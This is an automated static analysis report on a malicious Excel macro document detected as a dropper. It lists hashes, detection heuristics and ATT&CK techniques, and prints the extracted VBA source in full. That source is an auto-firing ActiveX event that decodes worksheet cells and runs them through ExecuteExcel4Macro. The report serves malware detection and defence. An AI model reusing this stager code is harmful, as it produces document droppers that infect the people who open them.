Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a633110b7d2f045d…

MALICIOUS

Office (OOXML)

59.1 KB Created: 2020-08-04 06:15:57 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-07
MD5: 047cc28cf148ed238d6670d1d5bca664 SHA-1: 9602aeb96e139389cc200c27e5dcd8d130ac46f6 SHA-256: a633110b7d2f045d88b43c95838372d556de7bf9d2543149b9e5a984f9377539
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an OOXML document containing VBA macros. Critical heuristics indicate that an ActiveX event triggers the execution of decoded Excel 4.0 macro formulas. The VBA script's 'Available' subroutine iterates through constants, decodes them, and ultimately calls ExecuteExcel4Macro, suggesting it's designed to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-9208478-0' further supports its role as a dropper.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-9208478-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-9208478-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA ActiveX event runs worksheet-decoded XLM formulas critical OLE_VBA_ACTIVEX_XLM_CELL_STAGER
    VBA code attached to an ActiveX/UserForm event reconstructs formula text from worksheet constants using Split/Replace/Mid or character shifting, then executes it through ExecuteExcel4Macro or Run. This is a high-confidence malware stager that hides XLM formula execution in sheet cells; it is not a document-parser CVE.
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1343 bytes
SHA-256: 5008ba684bc22c352a9f83d8fd4245fdc506fb0ad4c56984257670741ad3d5e2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "box, 7, 0, MSForms, MultiPage"
Sub Available()
For Each a In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
w = a.value: oo = 10
If IsNumeric(w) = False Then
If Len(w) = oo Then ix = w
If Len(w) > oo Then xi = w
If Len(w) > 1 And Len(w) < oo Then cx = Chr(Range(a))
If cx <> 4 Then
df = mes(mes(df + cx, ""), "O")
Else
M = Replace(df, "X", Trim(ix)): M = Replace(M, "Y", Trim(xi))
ExecuteExcel4Macro (M)
df = "": End If: End If: Next
ActiveWorkbook.Close 0
End Sub
Function mes(p, r)
If r = "" Then mes = Replace(p, "SS", "S") Else mes = Replace(p, r & r, r)
End Function

Private Sub box_Layout(ByVal Index As Long)
g = "": Sd = msoFontAlignMixed: Available
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 15872 bytes
SHA-256: d0c3a3d506cd77df80c50bd6bc424da72e7fed7a92b7f24a0ea0b154eb286e9c
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 1408 bytes
SHA-256: 4609916d8bdbc79e29612828ccd046cae14d7ddc0bfea0db84520ad5f180a00d